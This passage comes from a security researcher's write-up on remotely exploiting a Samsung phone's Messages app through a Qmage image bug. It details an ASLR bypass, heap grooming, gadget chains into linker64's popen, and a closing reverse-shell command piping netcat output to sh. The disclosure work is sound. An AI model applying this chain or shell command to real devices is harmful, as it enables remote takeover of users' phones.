Neither of these cases seem particularly interesting right now, although we might want to go back to the low 32-bit mappings if we don't have any success with the higher regions. In general, the usual suspects for leaking (heap areas, libc.so, libhwui.so, …) are all located between 0x6f00000000 - 0x8000000000, which sums up to 68 GB of the effective randomization range. In other words, that's over 24 bits of entropy, a number that is certainly not very encouraging on its own. However, let's not despair just yet and instead let's look closer at how the mappings are laid out in the address space.

We could continue manually inspecting the maps files to look for more insights, but I found that staring at thousands of hexadecimal addresses was not an effective way to reason about the memory layout. As a fan of memory visualization, I wrote a quick Python script to convert a textual maps file to a 2048x8704 bitmap, where each pixel represented one 4 kB page and the color denoted its state and access rights:

  • black for unmapped pages
  • gray for mapped no-access pages
  • green for read-only pages
  • blue for read/write pages
  • red for execute-only pages

Converting three random memory layouts of the Messages process yielded the following results:

Example Android 10 memory layouts

ASLR definitely works, as all memory is mapped at different addresses across reboots. On the other hand, the entropy of the mappings relative to each other is rather low, as they seem to be packed very close together in the scope of each memory map. Furthermore, they add up to a relatively large memory area compared to the 68 GB randomization space. There is one huge continuous read-only (green) memory mapping that particularly stands out:

745c6ea000-745c6ed000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ed000-745c6ee000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ee000-745c9b3000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b3000-745c9b4000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b4000-745ca89000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca89000-745ca8a000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8a000-745ca8b000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8b000-745ca8c000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8c000-745ca8d000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8d000-745ca90000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca90000-745ca91000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca91000-745ca92000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca92000-74dc6ea000 r--p 00000000 00:00 0          [anon:cfi shadow]

This is an auxiliary memory region for Control Flow Integrity (CFI), a security mitigation enabled in Android user-mode code since version 8 and in kernel-mode since Android 9 (source). As explained in the documentation, the shadow area stores information that helps locate the special __cfi_check function for each code page of a CFI-enabled library or executable. There are 2 bytes of metadata reserved for each page in the address space, and the overall CFI shadow spans 2 GB of memory (for instance in the layout above, 0x74dc6ea000 - 0x745c6ea000 = 0x80000000). This means that there is always a continuous 2 GB chunk of memory somewhere in the total 68 GB search space, and other interesting mappings are located in its direct vicinity.

Because the shadow area is readable, it is detectable with our existing ASLR oracle. We can find it by running a linear search of the address space in 2 GB intervals, and once a readable page is detected, by checking if 1 GB directly before or after it is readable too. Such a logic will deterministically find a valid address inside the CFI shadow in between 2 and 36 oracle queries (plus potentially one or two for some failed 1 GB checks). From an attacker's perspective, this is fantastic news, as it makes it possible to identify an approximate location of data and code in a very reasonable run time.

Knowing some readable address is already big progress, but it isn't readily usable yet. However, thanks to the fact that our oracle can probe entire memory ranges, we can use a simple binary search algorithm to determine the beginning or end of any readable area in around log2n steps, where n is the maximum expected size of the region. For a 2 GB region, that's a fixed number of 19 iterations, so the total number of queries needed to find the bounds of the CFI shadow is between 21 and 55.

Ironically, CFI is not even enabled for the libhwui.so library that we're exploiting, so while it is technically a mitigation, it worked solely in the attacker's favor in this case. This is not to say that CFI or other defense-in-depth mechanisms are bad to begin with, but rather that they should be carefully designed and scrutinized for regressions that might bring their overall security impact down to a net negative. This specific CFI weakness was fixed by defaulting to PROT_NONE as the access rights of the unused parts of the shadow (more than 99% of its space), and it will ship in a future version of Android. For a somewhat related read on the subject of mitigation (in)security, please see Jann Horn's "Mitigations are attack surface, too" post on the Project Zero blog.

Finding initial cheap exploit gadgets – linker64

Now that we can establish the start and end of the 2 GB CFI region, we should use the information to disclose the base addresses of some nearby libraries. When I inspected the memory maps on my test phone, I noticed that a fixed set of 168 modules was persistently mapped at addresses higher than the shadow, and 54 modules below it. All libraries that I was potentially interested in leaking (e.g. libhwui.so, libc.so) were placed within 128 MB from the end of the CFI shadow, so I decided to focus on that area. Let's zoom in on the three unique memory layouts visualized earlier in this post:

Visualization of the 128 MB of memory after CFI shadow

There aren't too many similarities between these three layouts, and in hindsight, this is expected as the library load order has been randomized in the Android linker since 2015. As a result, there aren't any constant library offsets relative to the CFI shadow that we could readily use. Nonetheless, one region has an exceptionally low variance between all three memory layouts – the bottom green stripe separated from the rest of the libraries with a large non-readable gap (marked in gray):

A memory region with particularly low randomization entropy

What is it?

733e63b000-733e643000 rw-p 00000000 00:00 0       [anon:thread signal stack]
733e643000-733e644000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e644000-733e645000 rw-p 00000000 00:00 0       [anon:Allocate]
733e645000-733e646000 r--p 00000000 00:00 0       [anon:atexit handlers]
733e646000-733e647000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e647000-733e648000 r--p 00000000 00:00 0       [vvar]
733e648000-733e649000 r-xp 00000000 00:00 0       [vdso]
733e649000-733e681000 r--p 00000000 103:09 216    /system/bin/linker64
733e681000-733e752000 r-xp 00038000 103:09 216    /system/bin/linker64
733e752000-733e753000 rw-p 00109000 103:09 216    /system/bin/linker64
733e753000-733e75a000 r--p 0010a000 103:09 216    /system/bin/linker64
733e75a000-733e761000 rw-p 00000000 00:00 0 
733e761000-733e762000 r--p 00000000 00:00 0 
733e762000-733e764000 rw-p 00000000 00:00 0 

As it turns out, it is not one mapping but several adjacent Linux internal regions, with a bulk of the address range taken up by the /apex/com.android.runtime/bin/linker64 module (linked to by /system/bin/linker64). It is the interpreter used by other dynamically linked executables, equivalent to /lib64/ld-linux-x86-64.so.2 on Linux x64:

d2s:/system/bin $ file app_process64
app_process64: ELF shared object, 64-bit LSB arm64, dynamic (/system/bin/linker64)
d2s:/system/bin $

The fact that linker64 is the first ELF loaded in memory by the kernel explains its low address entropy relative to the CFI shadow – it is not subject to the same load order randomization as other libraries. The question is, is it useful for exploitation?

In the firmware of my test Note 10+ device (February 2020 patch level), the linker64 file is 1.52 MB in size. If we open it in IDA Pro (or your favorite disassembler) and browse the functions list, we can immediately spot a number of routines that could be chained together or used on their own to achieve arbitrary code execution. For example, there is a generic _dl_syscall function for invoking system calls, wrappers for specific syscalls operating on files and memory (e.g. _dl_open64, _dl_read, _dl_write, _dl_mmap64, _dl_mprotect), and even functions for starting new processes such as _dl_execl, _dl_execle, _dl_execve, and _dl_execvpe. However, the absolute number one is the __dl_popen function with the following definition:

FILE* popen(const char* cmd, const char* mode);

For all intents and purposes of the attacker, the routine is equivalent to libc's system() in that it executes arbitrary shell commands. The only notable difference is that it also accepts a second argument that has to be a valid, readable pointer. Otherwise, they're essentially the same, which means that we likely won't have to locate libc.so or similar libraries in memory, as linker64 already provides plenty of practical exploitation gadgets. If you're curious how __dl_popen even made its way into linker64, it's through convertMonotonic defined in system/core/liblog/logprint.cpp (called by _dl_android_log_formatLogLine), which uses the function to parse dmesg output:

Decompiled code of the convertMonotonic function

Now that we know we are interested in leaking linker64, we should figure out how many oracle queries it will take. To find a precise answer, I used my test device to generate a corpus of 4000 unique memory maps, which should be a statistically significant sample size for running various kinds of analyses. Within that corpus, the offset of the linker64 base relative to the end of the CFI shadow ranged between 107.94 MB and 108.80 MB, so less than 1 MB of variance. If we also account for any readable regions directly adjacent to the CFI shadow, which cannot be distinguished from the shadow memory by our oracle, the distance to linker64 ranged from 104.05 MB to 108.40 MB. Just to add a bit of versatility in my exploit, I implemented the search starting from a round 100 MB offset from the CFI end.

The logic of identifying linker64 in memory is as follows: we probe a single page in 1088 kB intervals (the span of linker64 in the address space), and when we encounter a readable one, we check if there is a 544 kB accessible region to the right or left of the page – if that's the case, we found some address inside the ELF. We then use the binary search algorithm again, which takes exactly 9 iterations to determine the end of the readable area. After subtracting the size of the module and the few pages of adjacent memory (0x11B000 in total) from the resulting address, we get the base address of linker64.

With this logic, my testing indicates that the leaking of CFI shadow + linker64 takes between 38 and 75 oracle queries, with an average of 56.45 queries on the memory maps corpus mentioned before. This translates to around 40-80 minutes of exploit run time, which is a very satisfactory efficacy so far.

Locating libhwui.so in memory

At this point in the research, I spent some time trying to complete the attack based solely on the linker64 base address. The key piece of the puzzle was a suitable gadget function which had to meet the following conditions:

  • Had its address stored somewhere in the static memory of the module, such that we could point the fake vtable of the android::Bitmap object there and trigger a call to the function.
  • Called a function pointer loaded from the first argument, preferably with parameters that were either controlled or pointed to controlled data.

Unfortunately I didn't manage to find any applicable gadgets during my brief manual analysis, but I don't rule out the possibility that they exist and perhaps could be recognized with a more automated approach. This is left as an open challenge to the reader, and I'll be very interested to learn how RCE can be achieved with the help of linker64 alone.

As we can remember from Part 3, it is possible to call a controlled function pointer with two arbitrary arguments by corrupting the android::Bitmap.mPixelStorage.external structure fields. The only requirement is that we must know the base address of libhwui.so, to restore the Bitmap vtable pointer to its original value in the linear buffer overflow. And so, I started contemplating how the specific library could be efficiently recognized among all the other 168 shared objects loaded in random order within ~100 MB of the CFI shadow. I turned my eyes to the memory visualization bitmaps again.

For simplicity, let's eliminate blue from the color palette of the memory map (previously used for rw- mappings), and use green for all kinds of readable pages (incl. r--, rw- and r-x). This is closer to how the ASLR oracle "sees" memory, and it should make it easier to understand the layout of memory we're operating on:

The oracle's view of the 128 MB address range after CFI shadow

The numerous red regions in the bitmap are not inaccessible PROT_NONE mappings, but rather they are sections of code with the "r" bit off:

74dd777000-74dd9a3000 r--p 00000000 103:09 4238    /system/lib64/libhwui.so
74dd9a3000-74ddf3c000 --xp 0022c000 103:09 4238    /system/lib64/libhwui.so
74ddf3c000-74ddf41000 rw-p 007c5000 103:09 4238    /system/lib64/libhwui.so
74ddf41000-74ddf69000 r--p 007ca000 103:09 4238    /system/lib64/libhwui.so
[...]
74de900000-74de92a000 r--p 00000000 103:09 4575    /system/lib64/libvintf.so
74de92a000-74de978000 --xp 0002a000 103:09 4575    /system/lib64/libvintf.so
74de978000-74de979000 rw-p 00078000 103:09 4575    /system/lib64/libvintf.so
74de979000-74de97e000 r--p 00079000 103:09 4575    /system/lib64/libvintf.so

The nonstandard memory rights are caused by a new Execute Only Memory (XOM) mitigation introduced in Android 10. Unfortunately, similarly to the CFI shadow, the mitigation doesn't interfere with our exploit in any way and instead makes the exploitation considerably easier. That's because every library in memory is now fragmented into three parts:

  • A readable area used by .rodata, .eh_frame and similar segments.
  • A non-readable area for the .text and .plt segments.
  • A readable area for sections such as .data and .bss.

The middle non-readable part creates an observable gap of a fixed size, which can be successfully used to fingerprint libraries in memory. To make things even worse, this is especially easy for libhwui.so, because it is by far the largest shared object loaded in the address space, spanning 7.94 MB split into: 2.17 MB (readable), 5.59 MB (execute-only), 180 kB (readable). In the memory map above, it is easy to spot as the single biggest continuous chunk of red color:

Representation of libhwui.so in the memory visualization above

Thanks to XOM, the question is not if we can find libhwui.so, but how efficiently we can find it. Let's consider our options.

Memory scanning algorithm #1 – basic search over mapped regions

To reiterate our working assumptions, the goal is to quickly and accurately identify the 7.94 MB libhwui.so mapping within ~100 MB of the end of CFI shadow. The first algorithm that I tested was very simple:

  • Check the readability of one page in 2.17 MB intervals, such that we always test a page inside the first readable libhwui.so region of that size.
  • If the page is readable, find the end of the accessible region with binary search: let's call it X.
  • Test if the surrounding memory looks like our library:
    • oracle(X - 2.17 MB, 2.17 MB) == True
    • oracle(X + 5.59 MB - 4 kB, 4 kB) == False
    • oracle(X + 5.59 MB, 180 kB) == True
  • If all conditions are met, we have a candidate for libhwui.so.

For fully reliable output, the algorithm collects all candidates over the 100 MB area, and if there is more than one at the end of the scan, it makes additional queries to check non-readability at random offsets of the suspected .text sections, until a single candidate remains. However, since the heuristics used to find the candidates are already quite strong, we might cut some corners and just return the first candidate we encounter hoping it's likely the correct address. This is what I call "light mode", and in my research, I've tested both modes of operation of each algorithm to compare their accuracy and performance against the my memory map corpus.

Let's look at the numbers of our initial algorithm:

Algorithm #1
Light mode
Full mode
Min. oracle queries
14
256
Max. oracle queries
370
427
Avg. oracle queries
162.90
370.15
Accuracy
99.1% (3964/4000)
100% (4000/4000)

For a first idea, that's not a terrible outcome – especially in light mode, the number of queries and the accuracy are somewhat acceptable. The 0.9% error rate is caused by the fact that we don't verify the non-readability of the whole 5.59 MB .text section, and we only know that it's non-readable at the beginning and end. This may lead to false positives if other libraries are laid out in memory so unfavorably that they produce a mapping boundary at the offset we are testing for. The full mode mitigates the problem, but at the cost of more than doubling the average number of needed queries, which doesn't seem worth the extra 0.9% accuracy. It is probably more effective to just add a few more random checks of the .text segment to light mode, which would still retain its heuristic nature, but could reduce the error rate to a negligible percentage.

Now that we have a general idea of how the libhwui.so detection algorithm may look like, let's see if we can make any substantial improvements.

Memory scanning algorithm #2 – forward page sampling

In the previous algorithm, we spent 9 iterations in each binary search to find the end of a region, and we invoked it for each of up to 100 ÷ 2.17 ~= 46 readable pages we could have encountered during the scan. This is very wasteful, because most locations in memory look nothing like libhwui.so, and we can quickly disqualify them as candidates without involving the costly operation. The key is to better utilize the fact that we are looking for a huge 5.59 MB continuous non-readable region, whereas most of the search space is actually readable.

Specifically, we will continue sampling pages in 2.17 MB intervals, but instead of treating every readable page as a valid lead to follow up on, we will only act on a series of [1, 0, 0] oracle results. This is how libhwui.so will manifest itself in the sampling output, since the 2.17 MB readable prologue will generate exactly one "1", and the 5.59 MB gap will produce at least two 0's. The three final conditions verified for each candidate in algorithm #1 remain the same here. Of course, the light mode of this improved method is still prone to false positives, but the error rate should be lower because we're verifying two additional offsets in the non-readable range. Furthermore, the algorithm should be more effective, since we're performing the same amount of sampling but much fewer binary searches. Let's see if this is reflected in the numbers of my memory maps data set:

Algorithm #2
Light mode
Full mode
Min. oracle queries
16
71
Max. oracle queries
120
143
Avg. oracle queries
44.90
92.25
Accuracy
99.925% (3997/4000)
100% (4000/4000)

Indeed, both the accuracy of the light mode and the oracle query counts have greatly improved. We can now locate libhwui.so with almost full confidence in an average of ~45 iterations, which is a very satisfying result. Combined with the avg. 56.45 queries needed to leak the end of CFI shadow and linker64 base address, it adds up to ~100 queries statistically needed to execute the attack, which is well within the bounds of my initial objective (<480 queries total).

The algorithm in this shape was used in the recording of the Galaxy Note 10+ exploit demo video in April 2020, with a minor difference of using 2 MB sampling intervals instead of 2.17 MB. Since then, I have come up with some further optimizations that I will discuss in the section below.

Memory scanning algorithm #3 – the Boyer-Moore optimization

If we think about it, our algorithm currently spends most of the time performing a kind of string searching of the [1, 0, 0] pattern over a sampled view of the address space. In the process, we linearly obtain the values of all consecutive samples until a match is found. But perhaps we could borrow some ideas from classic string searching algorithms to reduce the number of comparisons, and thus the number of pages needed to be sampled, too?

One idea that I had was to run the matching starting from the "tail" (last value) of the pattern and iterating backwards, instead of starting from the head. This is a concept found in the Boyer-Moore algorithm, and it improves the computational complexity by making it possible to "skip along the text in jumps of multiple characters rather than searching every single character in the text.". This is especially true for a pattern of the form N × [1] + M × [0], such as [1, 0, 0]. For instance, if there is a mismatch on the last value of the pattern, we know for sure that there won't be a match at offset 0 (currently tested) or 1, and we can resume the search from offset 2, completely skipping an extra offset in the text.

Let's demonstrate this on an example:

Sampled memory map:


1
1
0
1

1

1

1
0
0
Pattern matching process:
1
0
0













1
0
0












1
0
0













1
0
0













1
0
0













1
0
0













1
0
0

As we can see, thanks to the multi-offset jumps enabled by early mismatches in the tail of the text, 5 out of 14 locations in the sampled memory map were never touched by the algorithm, and their values didn't have to be determined by the ASLR oracle. In this case, it is a 35% reduction of the number of necessary oracle queries, and the effect of the optimization can be further amplified by decreasing the sampling interval to some extent, thus making the searched pattern longer. The fact that most of the search space contains readable regions contributes to its success, as the tail comparisons tend to fail early, leading to large jumps skipping broad ranges of memory.

I implemented the optimization in my exploit and experimented with various configurations, to finally conclude that the most efficient setting was a 1 MB sampling interval and a [1, 1, 0, 0, 0, 0, 0] oracle pattern. It was measured to have the following performance:

Algorithm #3
Light mode
Full mode
Min. oracle queries
19
38
Max. oracle queries
64
88
Avg. oracle queries
29.63
58.90
Accuracy
100% (4000/4000)
100% (4000/4000)

In my opinion, that's a solid result. In comparison to algorithm #2, the maximum number of queries was reduced 120 → 64, the average queries decreased by 34% (44.90 → 29.63), and the light mode accuracy reached 100%, making it virtually indistinguishable from the full mode. I think it's a good time to wrap up the work on the libhwui.so leaking logic, but if you have any further ideas for improvement, I'm all ears!

Putting the ASLR bypass together

We can now combine the CFI shadow, libhwui.so and linker64 disclosure logic and run some final benchmarks on the code. In my testing, the final exploit takes between 45 and 129 oracle queries to calculate the two library base addresses, with an average of 85.91 requests. Assuming that the heap buffer overflow is very (99%+) reliable, and every query is only made once, this is equivalent to around 1 – 2.5 hours of run time. An animation illustrating the end-to-end process of a remote ASLR bypass is shown below:


It's worth noting that the animation depicts the exact same queries that were made in the original exploit demo recorded in April, so it's based on the slightly slower algorithm #2. The usage of the optimized algorithm #3 would further reduce the number of necessary queries for this memory layout from 86 down to 75.

Moving on to RCE

As discussed in Part 3, knowing the locations of libhwui.so and linker64 allows us to redirect the Bitmap vtable to any function pointer found in the static memory of these modules, or call any of their functions directly with two controlled arguments, by corrupting the android::Bitmap.mPixelStorage.external structure. The simplest way forward would be to call the __dl_popen routine with a shell command to execute, but that requires us to pass an address of our own ASCII string, which we currently don't know. I have briefly looked for ways to inject controlled data into the static memory of libhwui.so as a side effect of some multimedia decoding, but I failed to identify such a primitive.

Of course, the current capabilities at our disposal are so strong that completing the attack should be a formality. Since we can trigger x(y,z) calls where all of x, y, z are all controlled 64-bit values, we could find a write-what-where code gadget and use it twice in a row to set up a minimalistic 16-byte reverse shell command in some writable memory region. This could certainly work, but it would require the android::Bitmap overflow to succeed three times in a row (twice for the write-what-where and once for the RCE trigger) without any app restarts in between, which seemed to be a risk to the reliability of the exploit. I had hoped to achieve remote code execution in just a single MMS, but how do we do it without any clue as to the location of our data in memory?

One idea would be to have a pointer to our data passed as the first argument of the hijacked function call, without explicitly knowing or leaking the value of the address. Let's see if this could be applied to the mPixelStorage.external structure with a partial overflow, and how it overlaps with the legitimately used heap structure within in the encompassing mPixelStorage union:

    struct {
    struct {
  /* +0x80 */ void* address;
  /* +0x80 */ void* address;
  /* +0x88 */ size_t size;
  /* +0x88 */ void* context;

  /* +0x90 */ FreeFunc freeFunc;
    } heap;
    } external;

Conveniently, heap.address points to the bitmap pixel buffer and it overlaps with external.address, the first parameter passed to external.freeFunc. On the other hand, with the linear overflow we're using, it is impossible to modify external.freeFunc without first destroying the values of external.address and external.context. Does it mean that the whole idea is doomed to fail? Not at all, but it will require slightly more heap grooming than originally expected.

Calling functions with a string argument

Overall, I have discovered two different methods to pass string parameters to arbitrary functions – one during the initial exploit development in April 2020, and the second, admittedly a simpler one, while writing this blog post in July. :) I will briefly discuss both of them below. If you wish to follow along, you can use the reference android::Bitmap corruption Qmage sample shared on my GitHub.

Technique #1 – an uninitialized freeFunc pointer

We already know that we can't reach the external.freeFunc pointer without corrupting the other two fields in the structure. However, let's consider what happens if we still cause the heap → external type confusion by switching android::Bitmap.mPixelStorageType to External, but stop the overflow at that and don't corrupt anything beyond offset 0x70. As expected, external.address will assume the value of heap.address, external.context will be equivalent to heap.size, and external.freeFunc will remain uninitialized, because there is no corresponding field at that offset in the heap structure. Later on, when execution reaches the Bitmap::~Bitmap destructor, it will attempt to call the uninitialized function pointer. At that point, the first argument points to a buffer with our data (great!), but we don't really control the instruction pointer… or do we?

In order to set the uninitialized android::Bitmap.external.freeFunc field to some specific value, we would have to trigger an allocation in the same bucket as the Bitmap (129-160 bytes), fill it with our data, have it freed, have one other chunk in that bin size freed, and then have the Bitmap object allocated shortly after. This is caused by jemalloc's FIFO tcaches, which return the most recently freed region in the given bin size, and the fact that the Bitmap creation involves two 160-byte allocations: one for the (overflown) pixel buffer and the other for the C++ object itself. To reiterate, here's an example of a desired set of heap operations that would allow us to control external.freeFunc:

  1. malloc(160) → X
  2. malloc(160) → Y
  3. /* write controlled data to Y */
  4. free(Y);
  5. free(X);
  6. malloc(160) → X (Bitmap pixel backing buffer)
  7. malloc(160) → Y (Bitmap C++ object)

The Bitmap object is generally allocated very early in the image decoding process, but there is a bit of Qmage-related code that executes right before it: the header parsing code reached through the SkQmgCodec::MakeFromStreamParseHeaderQuramQmageDecParseHeader chain of calls. We can use the SkCodecFuzzer harness with the -l option to obtain a list of heap-related function calls made during header parsing, on the example of the Qmage test file:

malloc(      1216) = {0x408c0f8b40 .. 0x408c0f9000}
malloc(        48) = {0x408c0fafd0 .. 0x408c0fb000}
malloc(      1176) = {0x408c0fcb68 .. 0x408c0fd000}
malloc(      1176) = {0x408c106b68 .. 0x408c107000}
malloc(        17) = {0x408c108fef .. 0x408c109000} ───┐ (X)
malloc(      1024) = {0x408c10ac00 .. 0x408c10b000} ──┐│ (Y)
malloc(      7160) = {0x408c10c408 .. 0x408c10e000} ─┐││ (Z)
free(0x408c10c408) <─────────────────────────────────┘││
free(0x408c10ac00) <──────────────────────────────────┘│
free(0x408c108fef) <───────────────────────────────────┘
malloc(       792) = {0x408c139ce8 .. 0x408c13a000}
malloc(        48) = {0x408c13bfd0 .. 0x408c13c000}
[+] Detected image characteristics:
[+] Dimensions:      4 x 10
[+] Color type:      4
[...]

In the above listing, call stacks were edited out for brevity, and the trace was adjusted to match the allocations sequence observed on a real Android device. There are a few malloc calls, but most of them outlive the header parsing process, except for the three allocations of size 17, 1024 and 7160, highlighted in orange. They are all made during the decompression of the optional color table, and have the following functions:

  • Region X (17 bytes) is used to store the raw, zlib-compressed color table read directly from the input Qmage stream.
  • Region Y (1024 bytes) is used to store the inflated color table, which further undergoes some Qmage-specific processing.
  • Region Z (7160) is a fixed size inflate_state structure allocated inside inflateInit2_.

Considering that both the length and contents of regions X and Y are user-controlled, they match our requirements just perfectly. If we make them both between 129-160 bytes long, and set up the deflated data to have a specific 64-bit value at offset 0x90, then the pixel buffer will reuse region X, the Bitmap object will reuse region Y, and the freeFunc pointer will inherit the specially crafted value from the color table. This can be confirmed with a simple heap-tracing Frida script attached to the com.samsung.android.messaging process:

[9698] malloc(160) => 0x75aad1e980 ────┐    (deflated color table)
[9698] calloc(1, 152) => 0x75aad1ea20 ─┼─┐  (inflated color table)
[9698] malloc(7160) => 0x75b5557000    │ │
[9698] free(0x75b5557000)             (X)│
[9698] free(0x75aad1ea20)              │ │
[9698] free(0x75aad1e980)              │(Y)
[9698] malloc(792) => 0x75b5683500     │ │
[9698] malloc(48) => 0x7649a96140      │ │
[9698] calloc(160, 1) => 0x75aad1e980 <┘ │  (pixel buffer)
[9698] malloc(160) => 0x75aad1ea20 <─────┘  (android::Bitmap object)

Indeed, both regions allocated in the color table handling were then reused for the Bitmap object. If we set the freeFunc pointer to all 0x41's, and configure the first few pixels of the bitmap to contain an ASCII string, we should be able to trigger the following crash via MMS:

Thread 46 "pool-8-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 22783.23006]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x000000754e54ba60  →  "Hello, world!"
$x1  : 0xa0
[...]
$pc  : 0x41414141414141
$cpsr: [NEGATIVE zero carry overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644d6df00 in android::Bitmap::~Bitmap() ()
Backtrace stopped: Cannot access memory at address 0x75b61149c8
gef➤

Success! We have managed to hijack the control flow while having the first argument (X0 register) point to a text string of our choice, without having to leak its address. Before using this primitive to execute commands, let's quickly review an alternative method to achieve this outcome.

Technique #2 – libwebp to the rescue

If we look at the full definition of the android::Bitmap class, as presented in Part 3, we'll notice that the address of the pixel buffer is stored not just in the heap.address field at offset 0x80, but also at offset 0x18 as part of the SkPixelRef base class:

  /* +0x18 */ void*   fPixels;

This means that to achieve our goal, we should look for routines which call a function pointer loaded from some offset within the this object, and pass the value at offsets 0x18 or 0x80 of this as its first argument. We could then point the fake vtable at that function, provided that there is a reference to it somewhere in static memory of libhwui.so or linker64.

One example of such a fitting gadget that I have found is the static Execute function used in libwebp, which is compiled into libhwui.so (not once but twice, thanks to the Qmage codec):

static void Execute(WebPWorker* const worker) {
  if (worker->hook != NULL) {
    worker->had_error |= !worker->hook(worker->data1, worker->data2);
  }
}

A static pointer to it is located in the global g_worker_interface structure:

static WebPWorkerInterface g_worker_interface = {
  Init, Reset, Sync, Launch, Execute, End
};

It calls a function pointer with two arguments, both of them loaded from an input WebPWorker structure. Let's compare it side-by-side with the prologue of android::Bitmap:

typedef struct {
struct android::Bitmap {
  /* +0x00 */ void* impl_;
  /* +0x00 */ void *vtable;
  /* +0x08 */ WebPWorkerStatus status_;
  /* +0x08 */ int32_t fRefCnt;

  /* +0x0C */ int     fWidth;
  /* +0x10 */ WebPWorkerHook hook;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void* data1;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ void* data2;
  /* +0x20 */ size_t  fRowBytes;
} WebPWorker;
};

This layout checks all the boxes for successful exploitation: data1 overlaps with fPixels, the hook function pointer is stored before it, and there is still enough room left for the fake vtable pointer and refcount. It would be hard to imagine more convenient circumstances, as we get a reliable, controlled call with a string argument with just a minor Bitmap overflow of 0x18 bytes:

  • vtable → &g_worker_interface.Sync in libhwui.so,
  • fRefCnt → 1,
  • fHeight (full 64-bit value at offset 0x10) → destination $PC value

We can once again test it via MMS against the Messages app:

Thread 45 "pool-9-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 13453.13651]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007520edcb20  →  "Hello, world!"
$x1  : 0x10
[...]
$pc  : 0x41414141414141
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
0x0041414141414141 in ?? ()
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644bb78d4 in Execute ()
#2  0x0000007644d9c670 in SkBitmap::~SkBitmap()
#3  0x0000007647952f80 in doDecode
#4  0x0000007647951c90 in nativeDecodeStream
#5  0x0000000072494ff4 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤

This gets us within arm's reach of popping a shell on the remote device. There's just one last detail to take care of…

Adjusting the second argument

As mentioned earlier, the major difference between libc's system() and linker64's __dl_popen() is that the latter expects a pointer to readable memory in the second argument:

FILE* popen(const char* cmd, const char* mode);

Unfortunately, both techniques for setting the first parameter to a string clobber the second one with a small integer, which is never a valid pointer (see the X1 register values in the crash logs above). To solve the problem, we need to use an extra, intermediate gadget that will call another function pointer, pass through the first string argument and initialize the second one to a valid address. The ReadStreaEndError function, which is an (unused) part of the Qmage codec in libhwui.so, is the perfect candidate for the task. It operates on a structure that I have reverse-engineered and called QmageStream:

struct QmageStream {
  /* +0x00 */ void *data;
  /* +0x08 */ size_t offset;
  /* +0x10 */ size_t size;
  /* +0x18 */ int (*ReadStream)(QmageStream *stream, void *dst, size_t size);
};

The function's purpose is to read two bytes from the input stream and check if they're equal to "\xFF\x00" (in C-like pseudo code, with the QMG_CopyData wrapper edited out for clarity):

int ReadStreaEndError(QmageStream *stream) {
  unsigned char bytes[2];
  int result;

  result = stream->ReadStream(stream, bytes, 2);
  if (result >= 0 && (bytes[0] != 0xFF || bytes[1] != 0)) {
    result = -29;
  }

  return result;
}

So a function pointer from offset 0x18 of the input structure is called here, with the first argument set to the beginning of that structure, and the second being an address on the stack. That's exactly what we need, with the only downside being that the gadget limits the length of our shell command to 23 characters:

Thread 24 "pool-5-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 19535.20843]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007551ccad20  →  "It's a 23-byte command!"
$x1  : 0x000000755162f984  →  0x97e5e8ab00000000
[...]
$pc  : 0x42424242424242
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x42424242424242
───────────────────────────────────────────────────────
0x0042424242424242 in ?? ()
gef➤  hexdump $x0 L32
0x0000007551ccad20     49 74 27 73 20 61 20 32     It's a 2
0x0000007551ccad28     33 2d 62 79 74 65 20 63     3-byte c
0x0000007551ccad30     6f 6d 6d 61 6e 64 21 00     ommand!.
0x0000007551ccad38     42 42 42 42 42 42 42 42     BBBBBBBB
gef➤  bt
#0  0x0042424242424242 in ?? ()
#1  0x0000007644b6636c in ReadStreaEndError ()
Backtrace stopped: Cannot access memory at address 0x755162f9a8
gef➤

Both arguments are now compatible with the definition of __dl_popen, and if we change "BBBBBBBB" to the address of that function, we'll be able to execute arbitrary (though relatively short) commands!

Popping a (reverse) shell

While 23 characters is not much, it is perfectly sufficient to convert the short command to a full-fledged reverse shell. Android devices ship with toybox, a Unix command line tool set that includes some standard networking utilities, such as netcat. Unfortunately, the Android build of nc doesn't support the -e flag, which is the canonical way to set up a reverse shell, but we can work around that. One easy solution is to connect to a remote host and load a new command without any length restrictions, and pipe it to sh:

nc <host> <port>|sh

